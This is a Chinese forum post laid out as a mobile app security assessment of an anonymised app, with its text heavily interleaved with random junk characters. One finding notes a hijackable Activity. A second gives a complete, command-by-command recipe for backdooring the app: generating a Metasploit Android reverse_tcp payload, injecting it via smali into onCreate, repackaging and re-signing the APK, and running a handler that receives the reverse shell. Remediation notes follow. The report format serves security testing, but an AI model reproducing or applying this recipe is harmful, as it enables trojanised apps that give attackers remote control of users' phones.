* l2 n8 Q- X' @$ R# y1 X# z E0 h. m # [/ f7 C. M0 I8 ^   - i' x/ s5 i2 m/ n n% p% M 0 j- _6 l; X* e/ m6 G. d2 w" I0 o

! Z8 R; P/ _* t/ \( w$ n3 g- I. k8 Y$ a; ?

% G5 C3 X$ ?7 g$ A; f/ e4 z4 L , p6 S: Q/ t& }3 S2 v1 { 1-2 测试结果 " l$ H$ a1 O) q7 s 5 Z6 D! ]- O5 A& P

* g$ k9 Z# |6 e7 t" D# ^ * G3 r- z8 C; k8 J. p

8 h, }. }$ x9 @; X' S& A) M 8 z' D0 H, b, t4 i/ y* P   9 I( Q" z. M7 A# w( k 5 a( _& `. x. O. u

T, Z5 @% H# Z* o7 s7 Q+ B, h 8 e* T+ U! ]- i* b W4 Q; j4 S

2 J8 h7 ]: \$ ^3 e+ M# i% N$ k% k- y7 L0 t( }' T+ m) C! R 2 检测结果                    " h' f2 @0 r; Z 7 k( t* Q: z8 h

$ h# W- S( y% [, t6 i1 A, c5 S$ X1 g1 M- `1 y/ J b& Q, v3 I

8 L: z9 |0 p5 I. a. o' b7 }4 e $ @9 B4 R' O# p1 v$ r 2.1 某某某 7 \, y. r% E. W8 h8 z2 c) |% e5 o3 V* B/ C

_0 t' P8 y8 i2 r : R- V6 v5 O) v1 a+ D) X) o7 C* R

" P9 ]$ r( r2 O( b : I O- l r4 S' p" l! r 2.1.1检测目标 / f v: Q U' g3 }$ Z' P! B# p; V; y. T( M

" z6 Q9 b: N' I, j7 J- p6 g& v7 r9 o

% ]" W1 [% E0 v) ]" ^5 h6 R " K. \2 B- C8 x 目标地址: 某某某某某某APP ) b& ^9 V# {; }; V+ \; a ; J6 n& N& z2 u5 h

' K; s9 c# @5 e& c, W4 T$ Y 9 E2 g* x3 s' h: X1 T% Q0 Z

5 F# G! r o: Q. |5 ?5 @+ s d h9 \; P; l' F& P8 N6 u: }' Y/ c9 K5 B 2.1.2检测结果 ! e1 Y8 c" T, y: i! K8 l/ Y& ?. n ) k- {3 B) D, a

( m, \! D; R5 n+ \ g * S4 k- D# Y& E# C. {

2 X8 q+ [- J3 ?9 Q, K+ B) Z5 l6 V9 [( f" _ 2.1.2.1 0 Y1 M& f! q' x) q9 J/ P# i1 e ; Y7 E/ c& ~0 u+ i" B

! d$ ?0 s6 |7 `4 p% B3 a ; u- s2 ]3 j- _' P

$ f& d) |9 n2 }8 F " m5 [0 F7 L3 F7 Q$ r 漏洞链接地址:某某某某某某APP ' G1 D, h3 E; l) q2 R) P1 F9 ?$ {( P/ A4 T" i4 {+ ]2 ^

0 A, @, a: Z9 i7 D: W- H / S8 K& i2 b' f' {% f

4 O2 i# v5 `$ ?$ W( p1 T& M 8 p5 S! c; y. g   - p- f5 K# a) y, t" W) a, I 4 F( p6 }; E+ ^: h

; S& m6 j1 K) c: [6 j5 Y; Q # M2 |) n0 s. R1 M1 O

e b7 U) ~5 D! ]. J8 t , x0 n% K& R- J! D* c 漏洞分析及取证: 4 M5 U* O! g7 J% S3 |- x6 I" H+ B & \5 [: t' W' I, y* G& g( l4 v, W

, I/ W1 l, B$ K' G2 } - l; V3 K! M7 K

4 p* ^# W, _* w1 R% q 6 ]: g4 J: g- u% L& j! j                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: * _+ F. ?% X) F& @ % ^2 n2 ]* s0 i

y5 F6 g0 w, e1 k+ b: N5 q 5 q; v0 D& ?8 P0 s0 I' r9 y

1 f/ m! ]: Y! J& x , I$ F! l, r- ^      ) F9 a' _( g6 @. K* B ) K$ X* T s! [2 G- s& W) Q

6 U& b! K) {" Q. |0 |! [ 3 A8 T H' a$ |# s

7 [& Q, q7 l1 S h 4 R5 g* k0 v5 @3 Z4 l                       " l, n2 k, [% K3 q5 J( L 4 G* K7 K3 j, j# X* o. J% c

- C) Y- I( d+ e% g/ M! g8 O- _- l& o' j6 m+ n N% U/ J9 r5 q

9 ^2 t( a. {, l% C: |3 c( j$ i/ a- _$ k: s0 Y6 a( J3 N% | 7 `9 A! V3 J" `5 x& X8 H * |) `9 n4 A1 a

3 t0 X, R% ]& g2 S& g , n4 d1 K9 [- r. D6 k7 R- H" L

$ D q; ~& w# f3 |7 f+ Q; ?9 r/ X0 A) f" r$ V: w$ y1 m 4 y, i) v5 t. S9 h" |2 c) w5 j 3 Z5 l3 m; ~% H) a

% M5 c3 h4 j8 j9 m9 h# | ; S; w0 U) ^! P$ E& j [$ A

" M9 Q3 p5 W+ l* o. J4 G% |' d H6 P6 N$ x/ ~ 4 a* }; ^, b! Z" _3 H4 F; X & j% _, i4 m; F" {% q- _. |4 t

; n7 S9 a. p0 \0 z6 N 7 C5 ~. w$ M) o

) p: B' [& u+ n( n5 d0 }8 s & g; }9 z1 E2 a2 u. A/ L4 _6 y. _ 漏洞危害:高 7 Z8 E$ C0 ]8 t% A 7 @/ j3 Y% Z7 I

. v1 F8 F2 k6 D5 c P- H% e0 @* d0 O% r3 n6 }1 U6 v; @
# w; I) {0 z5 x- @ 8 p: Q& A% n m ) v' m) A& x# ^1 I/ L# A Q4 H$ R' Y" R- r3 U3 G4 R x' A8 `% w- j1 I0 k6 F* { I2 ?; p, P2 M2 b8 l! S! i8 V% U/ f) K0 ^0 b' m# e% E: o! @. V2 a+ T& {& L! x# A# b+ [6 n+ V/ Q3 ?# t# z8 i; J3 ]% \3 J J' u' t, u% Y; S& x* x, d: Z5 Y" o, H! e5 ^* S3 i) v9 l. P0 b0 v# A+ T6 C- P D: U, S; y% x) p; o; t! H8 \, |3 \! z9 y k( f$ C5 i& W; D$ e/ o1 g9 A' g. D2 q# v7 G$ `9 ?1 ^) Z8 v5 P2 r/ [8 v7 S ^6 i o2 S9 y8 x! V% l3 f( O4 V7 G% P0 ^# ~2 W, v* C- O' M' D3 {0 v8 o( f8 E' b5 Y- F: f- O; E: F9 P* y) [7 N# P3 P9 v, T- B+ P9 I3 ^: I& H) L2 k6 r
- J: g* f& @- h1 @6 r3 n1 D0 {) ] ) M) q% a. I$ _# h" f. N5 j

; v! F, a6 k9 Z7 [, [8 i " {$ t+ d& ]+ K) M, X: o 严重程度 " r3 h/ Z* q* I2 I) U " D6 }* M/ E+ T- U" E7 X

. M7 w5 i- U5 {9 L& x- S# ~1 H: A- v$ H6 s 		9 g, G. y+ D$ c7 z/ l9 T8 t$ {2 s! v$ {$ H

" ~/ x2 E4 o/ _7 \# j( k- |5 k: S & M! k5 i% l: P+ a3 [& J % a( r; G0 ]7 u9 N. q# { 6 Z0 m$ K; E0 q

" r" `' V7 g- j * [/ ~+ f: l8 _- ?+ R# O4 m, h 		7 R; ?1 U. a: P 2 C7 K S( V( p2 F+ {

- g+ L' Q. Z/ {" e( g& v2 l1 J 6 V! f: F* ?3 x7 m. } % g4 A. {# i6 D8 I& Z* B! A : C R( s: x1 G) {7 ]" ]

2 Q& o1 p' y3 d8 o4 P# `0 t/ M- ?( S ( b8 w- J' U$ h: b# I4 B3 a9 L 		& e: [$ G1 ]1 H9 h4 @) C# W& D$ |# x2 `, J! N* p/ `; s

8 \- F" ^3 t. q- @+ v$ u . A- C1 C9 G* ?% y5 z0 M! s / D9 w+ S, @" `1 S$ I/ k 9 R' S+ j% o( D, F5 M6 R1 c

4 B$ |1 O2 M9 k2 x : l- K6 z0 i9 G' l0 f 		s+ } q+ n) k- f' ]* ^& M * Z( J* K6 M- n# a# A6 a7 u3 S

# A3 G2 R+ ], L7 u/ | - v' a% T% @4 p) e) `# B2 p   ! _3 e: x* x* \# ^' B/ j1 q d, x' v, }

5 Y* b2 ]6 T- r( K3 {" k% ^& a6 L8 E$ ?) Q3 w, ^# O 		; K3 q3 o4 u. K" L9 G" B$ g4 c: G+ V; M @+ h9 z

! c! a% g* ?) w3 t+ T3 U3 R% t * i/ l1 j1 d9 ?9 T& w * k. a- B2 R0 r: F& z9 w7 o. B: z, [+ h/ a

4 x _5 M! q, j5 o9 x' w 7 d! ?% L' W5 Y8 @4 O0 M 		0 L3 |' B7 A: l: y ! s! k% w+ \/ U# J% } Z

" E3 V; A; s1 o0 J+ G4 S 1 @! N8 M8 I1 K; p   ' ~6 d% i3 \$ [* w2 s6 @2 F * i$ Q. M/ E- ^" G7 E+ L

4 R' d: Z. K8 n4 i5 a3 x # T. n( M$ M, [5 {0 |
; m+ [$ \7 X; c/ q5 i7 ~ 5 w' h7 D I, x" `) h0 v, O) v
7 h+ ~2 e: [/ O# ^ * O! A2 [! Q0 S0 D( `, ~2 e: V

& @" `; Y& D. {; b$ _- t. u; d 5 N' W2 ~0 v$ P9 o9 J2 g   9 P( e. [) D9 l; \ ; ]' ?- w; }' q1 u

5 a( q4 f9 w! m( H 4 I/ M; `% u1 }7 s8 T

8 s6 [, L8 t; H / s0 E/ r7 d% ^ 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 % G X3 R2 l! r) H. a # X% l% Q; m& }# K; Z) Y$ N( f

% r. x$ s" H' X . d, V+ d' \, T1 `( [! K3 C

0 k6 k- i7 ?3 _1 o 7 n6 D) g1 W {8 p7 p           % u" F U/ K1 Y0 Y' a' L# C ( B) z- d( y; A2 a: X5 @6 v+ ^

* C# [" E# T& Z2 r: w2 e 9 E$ V! H' H% n- J1 a# i/ N

4 e) A6 y: H& l: m' h0 w s D m# S9 V7 Q: `( {. \) ]; Y   + Y- R, S' s k1 i$ d3 a* a' t m) J

1 U. U7 N ^" k e $ C5 A% ?+ S* V6 T- D

2 |0 [# l- L9 P9 J G, g) G- c1 H % p' B7 [/ ~( s: U- z 2.1.2.2 6 T, M: O) z" ?2 m" ^6 L; A; d+ {* O3 v8 O9 A8 }

4 E; u9 S2 h7 q# `" }# J1 }% m3 L ' U* k) o: w9 O7 i, h T- S6 z

5 p. \; p* p9 U- R: W& E. q! }$ m9 J4 i 漏洞链接地址:某某某某某某APP 5 V& r; P( W2 x& Z + q8 y3 a9 N% k+ C1 [0 e$ Z2 l

& ]/ U9 x7 n) T3 u7 y7 E1 f- Q* O

0 y& x8 R3 y' o7 G0 @7 Z/ I- b# K; z& T, I7 h 漏洞分析及取证: * o( l* }, [5 B, l( C. L: y6 y5 ^8 O1 r/ [% v

& g: g0 i) A# Z. d6 _9 O0 }, D 8 T2 N+ S- \( }' w

& n9 V, U" }& ~ F; l7 q K! [! x( ^& t                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: 6 d# i& c- Z! j6 x 0 [/ ^8 [9 H; v: e, W; m

* T7 h+ c" D e/ x3 A0 h" ^ & C/ C8 W9 \- X) n, Q

9 Y( j* F' U; Q$ n5 j: P1 |1 {9 P: r8 @1 U6 k Metasploit 生成木马 apk 3 @# O, X6 B2 N/ _ 6 w. G+ }% @' G. U! ]: W/ I" L' R

5 V/ W* _& j: \2 p [) ]0 r. l% B0 {1 l& L% I

1 T3 L. A1 e' S9 l4 R) w, S9 }7 J, I3 i0 |; ^# E4 @' k0 c3 [! h msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk / J- z( A# D F: s- c# T # R- r) T: H& R- [3 r# J Z( R% g$ Q, g0 ~

4 Y5 A1 t8 B F" J " o. |5 Z2 H; R d$ m0 \

' p1 o% Q6 x4 ` + X/ ^8 o' l Z; c ~2 ^ 反编译目标apk和木马apk 4 _+ D3 d, `9 |! {% @+ S1 r* r, I- G & r$ ?- K; {5 E

3 r( l. [: l& `; _" [4 L4 w2 w7 _ 2 @. D1 V9 n/ j( _

& W: @5 w8 @' _/ v% z# ]; | 5 D3 _/ q" E0 T6 h- o apktool d target.apk
; B! q% U7 O$ X0 c0 z 8 b2 b% l7 T2 W! Z; g& S apktool d cockhorse.apk , ~7 u4 Y: Q- c. B: U4 @: \: i. e' V/ i* ]1 B6 N5 U: ^5 ]

3 p ^2 B1 N6 n5 U9 J9 e3 a$ O- v) a& I- r9 D0 W

5 Y7 C6 K4 A) _ 6 F0 o7 a+ P( S+ L5 [1 t$ Q4 y 木马 apk 注入目标 apk ' n7 F: O( U1 O+ G7 w' a - h3 P4 Q: N* Z

$ O; }% @ v; u+ `. E2 W' } 3 I& D! |) \! W$ p& x) J* J

% r; o0 p5 X4 k1 f! s$ {7 W* d7 a F, d4 [% r; R/ j+ ~( X 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
, E# t: i8 P8 B l+ B& ] ' p8 `% b7 q* ?" j; s3 ^ invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V # t% Y/ c6 ?: k; C/ G- N$ o5 i 3 @9 Q9 h7 _3 k4 ]9 B2 C' t

9 O! [6 \4 \6 |6 n8 j+ S( j( _; H 2 _2 h r0 U, _! c6 o5 t/ | f

3 Q% H; w$ j3 E9 t* Z7 L Y# q % Y/ b$ [) M7 E( i) A- C 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 ' w3 Q) t, {' T. i 9 ?- D' t# J! n* g M# t5 m! p

1 c7 O/ c0 ~! G1 r) u+ y( t * n* Y. S6 e+ h/ B9 S" A- q1 g

+ W! A/ C) }( p( E1 Y Z* i 8 C H) W, _, O: \" _9 U5 l0 Z 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ / ?3 K1 @# F7 ?0 a+ D& T: h6 V7 F0 Z0 Y) m2 n! J

# z6 w K5 f V" \( F o5 p$ a' H | D( K2 [( D% {

; C" z# x; D$ b f ! H" l) s9 W( ?4 p0 B 回编译生成最终 apk / Q- n, O1 x4 r. m5 s4 y3 }# u/ X b# E9 T2 y+ Q

3 O1 L$ i. y; R" q ; Y9 k/ F7 B( i

9 i- w0 P& c) n' h0 ^% s7 o2 \ 1 [( J" I) R% I% w: { 重新打包 0 @/ i+ }9 |4 G1 e& j' q( f8 } 2 O6 j* H& O- ~ w6 W

S5 k& H8 F. M% L0 j* K C1 b; p1 B, Z2 [" f' E/ m

h5 ~( g' t; [* O$ u4 ^/ [* z* E $ d7 M8 [5 p& }6 ?/ ? apktool b -o repackage.apk target_app_floder 0 Q& O1 N. S' a( a2 } - X; U% Y, A& n( K

; C1 J2 j5 Q, E" p; Y7 F# r( ]2 v2 F * h a- J1 [- z8 Z

% A( }4 |0 b# e- [ ^5 J4 n $ q+ m; Q8 e q, [" C 创建签名文件,有的话可忽略此步骤 / e* C) a) b& P+ a , ^; R2 h8 r/ H

6 R# I @1 U1 M& B# ~+ C" X0 U$ F$ Y% g/ ?" C8 h7 v5 j

9 e8 G% w0 b- e# z& f7 @) B0 S/ I8 O0 r& v- u( |- S keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                - [' i6 E! O! X9 \/ k" J& X " {6 Z' U8 _7 M- Y- O

0 ]( q8 Q1 ]. t$ } ! K/ t# m" o* J. V

2 m4 n/ g/ o0 m& P j # u) X; l4 q4 Z/ F* k0 q( e 签名,以下任选其一 & S$ B% D( `* o7 N ' X1 C- B; q# `. c* d1 T' ~

2 |9 G- b$ M' | 5 Q4 j3 }: G. n5 M9 P4 |7 D- L

, y$ G" M! S/ X: L% T* I 4 o* v/ P% t$ u w) O$ t/ s$ r, I( b jarsigner 方式 ) D/ Q" B( Z! d% t& u9 U$ @0 }# l- F% Y

0 R7 W2 T; q0 J) s! ^$ G) {( k $ _/ N& |- c4 K4 U: P6 o! K: @

" `! A, e9 \" @3 V0 @2 V ( } t0 _+ q7 J5 ?& o+ e4 [ jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname ; k: h U8 X' ]* ? * F' e T% z/ @, c/ l4 {* u

+ O& [1 S/ [0 A/ Y9 C: H# d9 D0 e8 X1 [

9 V) l+ n/ {/ T2 a5 ?7 n, j- P4 W " c2 {' ~; f8 `# x$ n, g4 d apksigner 方式 : B, s; `7 D: O 4 U- ^7 x- @0 C% L

2 g! L1 Y( H+ r ( A7 k/ T- j& R% s* r' Y; F

% L7 p) r1 _; z; u" ^: M( k6 e3 B' w# M apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 0 ?$ ^; [) @ V: ^1 Q; W! T7 I9 l ( W' R# x, ^6 }. n! d, D

$ D4 t+ R) r. c& l* A3 l% Y3 ^ ) k' t9 g( @3 s( L4 K( R+ r/ v8 I

3 U. h; i$ A0 f6 ~% K6 b" {- B0 |, C: L' x- A; T) p7 u- L7 P 如需要禁用 v2签名 添加选项--v2-signing-enabled false 8 p, Z; o; H4 J/ t W0 |% y! c- g/ i# o3 b% C

7 y0 V" h; i! g2 K , x" U! v8 {( M3 V* I9 M' @

9 L' v: p2 T/ P: i% j3 o c : B+ K; ^1 x! {3 Z* W 验证,以下任选其一 , E: _& K O( ?" y2 B8 o " R6 D$ n& V5 l

) D& H# W4 v) B3 v% I5 `# g% }0 {4 t3 o/ E: v6 P3 J; J

, R, Z- {) m6 h6 X2 W# J/ [# y2 Z! R, c- y' L/ _ jarsigner方式 3 X; j, K* f; \# [% _+ Y * p& V) C3 v d) \: v

- Q5 B, E4 F; c* I& ?8 x3 O) H: }/ D: W& n9 ]) z, P

. W; f1 m# G, o 7 ~5 A0 S Q5 u jarsigner -verify repackaged.apk 8 V8 z7 W V4 N( s) M/ V& F( b7 ?# y9 h

P! F, u0 J0 |0 u9 ~6 g# S$ h0 B( z, i4 o% b0 I* x4 _

" C0 ^; G& I4 k" d+ ^ * b1 u% A$ t1 W6 d& h apksigner 方式 1 N2 e; a, U( Q/ Y% u$ ~9 T% ?4 t1 f' d3 K: k, |( V. ?7 g

$ m3 T& S) I, R' w , ^3 V7 U6 V( g2 u) S! |$ P" Y

/ x9 k9 G# `4 M+ M1 g" {& v " O$ T- n7 T" |7 f" H$ Y) n apksigner verify -v --print-certs repackaged.apk ( K7 S2 Q$ M' k& ~1 Y9 C! _ ) D( v& n8 ^# L6 {

' t: g8 A" @1 X4 n4 v& U - Y7 X1 p7 [& R8 T, p! d9 ?

# N* u" U1 D0 @ $ K; @6 e3 A9 q1 F8 c keytool方式 ) f4 G2 C; H8 k4 O8 Q7 y% x g A3 P5 M" P. X6 M* G

8 e$ b6 ~. ^1 T5 W! G# Z3 _. m6 } # w$ b! Q: @ n" S$ `) P

( r7 z& o; v. f& Q6 d ! o g8 h# i. S* A! y7 w keytool -printcert -jarfile repackaged.apk , a! I) v9 G# T3 i3 h " n4 h! j. U9 B: \

, \ G4 g8 R5 M; k 1 `' @4 ]$ w. q/ _. D

0 M' ~8 O1 W/ q" q ; A4 N( {8 N5 e 对齐 % V7 V# }1 x- n3 ^ # k5 C/ E: |% W: T1 M

~9 ]: t. B3 i/ F* Z- m1 J* [" T# L% q

: P9 V6 C" Q* `4 j( [' J9 {& c6 m! n) G4 h, Q! m1 ]9 _! ? 字节对齐优化 , H# y, T2 y) m2 }( O' k. u' ^ & q8 y* e+ ~* L

" H; I3 n Y8 b, M+ Y$ e * z7 H1 I4 p9 Q) t

( @3 Q. D7 H% I& X, F9 Y" O , m* P' }. i# W3 C7 `- R zipalign -v 4 repackaged.apk final.apk 5 _! g8 p1 C- _" P 8 H( m, _5 u! y2 y- _6 l

4 h& f( a# C; u1 x$ j : ]4 t3 c6 R1 d% E- n; t

g4 |/ ]. ]" V1 z- C ( B+ A* B3 Q% u- H9 m2 I0 j6 P% l8 I 检查是否对齐 |& m8 n. b0 ]& k6 X- p2 M' q Y6 G- L8 [3 a; V( [& Z5 m

2 A8 K/ a0 R7 v; ~- I3 Y9 E e; w4 U) b$ U7 L6 H& p/ |: t

1 U( C0 ?$ @) `. T" h8 { ; H0 U+ N) V) [' l9 F zipalign -c -v 4 final.apk 7 i- x* @ J2 @# O P/ r' K! e" J% y 8 g1 s7 b9 d3 l7 s

/ M5 B) i2 x0 u. i }; `2 d* Y! z. [% ]) x6 t4 P

3 x! I6 _/ v0 [- I 4 H9 U7 v2 [+ u; G( q8 G. u( M 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 : C1 N% Q; U( D& G2 G) {' ]- P ( H7 E4 Q- y+ s0 s8 Y' T1 S! X

7 U( G3 s( u ^' D % W7 B1 {! K) R; F4 ~; H2 J+ m: b

% {1 [/ n z6 Q# l8 C8 ^6 Z3 u5 T5 t: r" q6 b+ q. e 启动Metasploit控制台,配置参数等待上线 ) h# ^/ E- P0 C, n7 K ( N1 b' w0 V+ T. ?

1 Q) f# b N. N0 ^" O; t5 [ a5 E# _6 X e, c( ~5 G) q0 J

: z! j4 J" p5 l% @0 [# O* C8 N- o2 b4 I4 M5 j 在终端依次输入如下命令 1 X! }0 O8 g7 S4 u1 z4 r - ]( h# ^8 }1 |9 z7 E, r s8 B. u

/ Z7 v6 j+ z3 ^' ~% x ) J9 v4 p) h" A' I% [7 d: e1 u

2 y1 [. i7 n2 ?4 e: O6 s / z0 m: y% M2 U1 ^: O' e: M msfconsole - j" N, I8 |3 j- P7 T+ Y; g3 D9 Y # g- ~! Q! m7 q! N% d- K

2 ~( U- u/ U& X$ K( s; D9 X / D t4 Y+ ?4 _; x% G! \% w2 r& M7 i

9 v p9 @; a) P3 J8 y( h) C 5 \/ g- g- O7 n" ]; @$ [4 X& P use exploit/multi/handler - U/ I) u B2 |8 X. ~9 l9 Y 3 u5 Y& Z8 M# V7 ]( l

. q: r) u% M4 l# N8 x 2 q. b/ F) {* ]

% L3 S& t) [, k; T& p* h * I# g0 K, \- y6 K$ @1 ?8 r; Y set PAYLOAD android/meterpreter/reverse_tcp 8 @! M' V" J X5 H4 U& [2 U6 U. k8 M r7 ^3 M4 q

* K( C+ ?' A/ ]' e1 |6 S* q2 D $ L$ S% |8 L; P$ x

- D5 u$ w0 s, S+ W4 C; J) E: a! A, F8 P8 M8 C( x$ F set LHOST 192.xxx.xx.xx 0 D0 c& g0 e$ l2 o& Q/ [9 j0 q! @; Z ~

8 v, A7 |2 l+ r0 ~0 F4 p m4 O) [4 M( N9 E5 t

9 D! [* I* F/ S: ^) Z4 Y" N+ P9 e5 z ^. u set LPORT 4444 / c/ @( I% R, s/ Q5 T - z7 u$ y" }& Z4 D

: E* J2 x, D2 a, L% g- x' h# V / V& M3 `( [2 N% q+ x

0 e5 u! [/ X: \ ' y# Y. ]/ I6 W6 O7 g$ u exploit * G, u, H, B+ }3 ?9 ^$ ?0 Q- }7 v% ]& z7 W% g; N% G

- J, r, {7 u- r. C ) N; g( o; c5 ?! d4 F8 X0 ]0 ?% ^

! f3 `$ E' x4 a) q9 f( ~9 i# o3 U @% ?2 q1 ? 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               # W) R: S$ j4 k5 {. X, l* ` 3 X6 e1 r: p6 u, M. X' L

& l) ^! S3 I* r5 }# X; Y 2 A7 _& `& C- n, _

! }% x5 Z8 i' b& A# E# J" ] 4 s3 `! T/ n( V) R 漏洞危害:中 S# T/ \) N j# R9 ? / r1 k3 G; {+ Z* g3 a

( t' n: y7 a8 N' S7 m ! ]+ D9 p+ C7 A( r2 ?' z
- r$ T& z3 g: C5 {, ` H) N/ F5 O% E % q5 Y, j% o7 N5 V: b! M- J $ l9 y; e+ v3 a4 q% g 6 ?# r% V. s+ _) M/ e% I0 y) x7 e- X5 g' C# V0 k( W+ G* B; S# |" E2 b0 L" I% ]; x) m4 _3 V. V2 h4 m, e- A4 h) @/ o# t# q1 j7 O5 t4 R) T) }; G4 B) |& j! L, K J( h8 \- u. }& \4 C7 X) p3 C( W# a1 S# ] ?! a5 g: W2 l9 J: S- P' _& x3 {% m& h! |5 O1 C9 K" i: I: f* p! |! m' X W" D3 r$ b; Q* ^+ F! X7 O9 \: Y) ~1 r0 L4 ^/ A$ c; n: Y# P/ T, h |9 l5 ~4 E. R+ c/ v" L6 a* l4 Z( n& u* s- C( j1 _1 r9 p: O8 @1 K- m% H# X1 E% I! i) Y/ }: x( Q" O/ |2 d: T o2 o/ x& z7 I0 Z- K K o: k7 u! Q7 S) e. f g8 h3 O4 n! \; J o$ b- _" b& G# W- A, J4 A! r9 c, R, K. h5 C- ]. }5 x! S8 {" D0 f2 w. X1 y0 E3 N
2 ?2 P) q) F9 K( F s/ ] : x* t4 g1 H( e

3 V/ ~& R/ A- _0 C5 f8 L& v5 ^ # x; u4 D' w; r2 U 严重程度 3 R0 V4 h) x+ g" d7 z& a5 t% ? # i) e1 _/ V c( ]0 R+ j3 C

) [6 Q4 H7 K/ a ' Y! k7 X5 c$ R0 f% S 		9 V& ^ w8 J. ~3 c( ~' F; Q 7 D) u# s4 x# n0 q" w) T

1 X/ b. v, U, s$ y" O 4 x" P. ~. b; R, g O / [: R2 B' f4 T/ k: T8 n. \ 5 V6 Y7 U: o+ [& x8 J

' ?# A& x4 L f B$ C/ X 4 a4 `, p6 c# T" L, F" Z 		9 U3 I$ Z: {& D# G) w. l u * a6 B, x% a) l% S, N

( y: j1 d2 G/ J( K3 I. h - y' o- g$ b7 d( ^ 4 s6 X: K" q" a) g, `3 ` . f$ q% r+ @, O! I

; K P# A' b. z6 h3 _2 H, ?9 x' i+ k& z# q( I$ C 		" n1 Y9 }! ]" ~; v' x & b9 \5 L& r! m/ G

! C+ F: t5 Y! |1 T$ F % p) z# j- F$ B( d6 k + J3 I5 E7 H. v; r; o * U! g+ O- A) k$ T8 f; C- U

$ e4 C& L& X9 l) D) t 9 Q2 l0 M% m* W: B 		7 j7 K* I: w# M5 @ $ w" t- Z! ^: z ! `8 o8 l' |; I9 |! T" E% _3 |0 E% P6 t/ @

- U& N7 |4 \1 Z. x0 |; Q% M" Q9 \& J3 k0 f4 c) [. w   * p$ k9 U# K( F; [: O & ?. I$ i3 e1 p

% F0 n [) F5 T + l+ T! u3 T s5 Y, t2 N4 S 		* ~0 U8 k' O0 n, L1 v/ } ! l w, Z: l+ j( z

4 s# z! p. c. R7 u3 y 5 }$ Q8 @# M: ` 4 n9 ?+ g2 S5 e2 B' O- |! X* B$ I7 s+ h 8 @; }8 L* ]0 a" l% U9 t! t

0 i, ~1 ~+ b8 i ! o7 ]! ~# L. r/ B! Y( B7 U 		7 y4 u$ s! ^9 Z- d( m* d : F: M5 g4 z# f( U ( h: t( z3 I( S& c - `$ {* A- D# W

) s/ c) P, F9 B i 5 h- J$ [$ C; o2 V* h. A7 b/ k   8 t7 ^3 Y% Z; p; O n0 R Y- k; N4 a4 v" P9 S0 j, B3 z

9 U# w. t* h- Q7 T- \1 k4 }! d4 x& F
9 ^0 u K- X7 m. ^3 }3 h ) _. B; d# `- ?8 |3 F4 Q; Y
O/ n& W8 t! x7 g6 S 3 g a! D4 i, f# o* m

) f6 O/ {4 }. C2 ^3 s ) C5 M" q& [1 \7 z) F+ \) _   ' Y0 I1 a! Q* y7 ]8 l; D: Q; H9 N G; s h6 V

# Q, M7 `3 A% H$ M- n( r 6 N& Y$ R9 A7 r; d

4 g# Y) Q$ d3 I# B% H 1 K7 k+ p' \, v `$ U* U. ~ 修复方法: # @* d; w0 k: J4 E e; M) E9 }( z* n- P$ F, }

F4 ^( b! C5 {9 {9 f " T+ f, V; {6 @! W8 C2 K

8 C& z5 v& X% l3 M8 N, y$ Z, b5 B9 C3 I               1. APP 启动时应做签名校验防止二次打包。
0 c' n7 `6 {7 X1 `) g* t2 _ 7 Z& b# p* N$ s! t& ? 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 ( c0 Y/ D7 y4 w+ @/ {/ C 2 \$ u' R3 w9 h( x7 \. x

; D; Q+ y- Q$ }0 T, E" e0 W + a+ Z7 ~* \' L0 ^* @! K % f- X4 X+ ]; G: v I _! k0 } ' P: ]) _! X; [" I

" V" U, _" o. v' s+ ` / F' E, \/ ^! ?5 i   4 V# t! z8 ~4 c( e. C9 j l9 F0 L0 M8 W& k- F

8 N* ]5 t, _8 Z$ l 8 [% D; j# a6 Z% ?: \+ j 2 A- T* z9 L% Q8 k; z - r5 C o5 G" p4 Q+ m# M9 c0 v! Y. M

2 ^& A& D) r- ?& F9 a4 [8 Z4 c, q" K( ]0 \$ @2 r6 s
' e3 p5 Z4 J9 `! |8 Z- l . ~" M4 m9 r6 c8 C

, C% H& e& ~' c% D4 S+ M + j% W7 s2 z; h2 R! P4 o1 Z- W
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表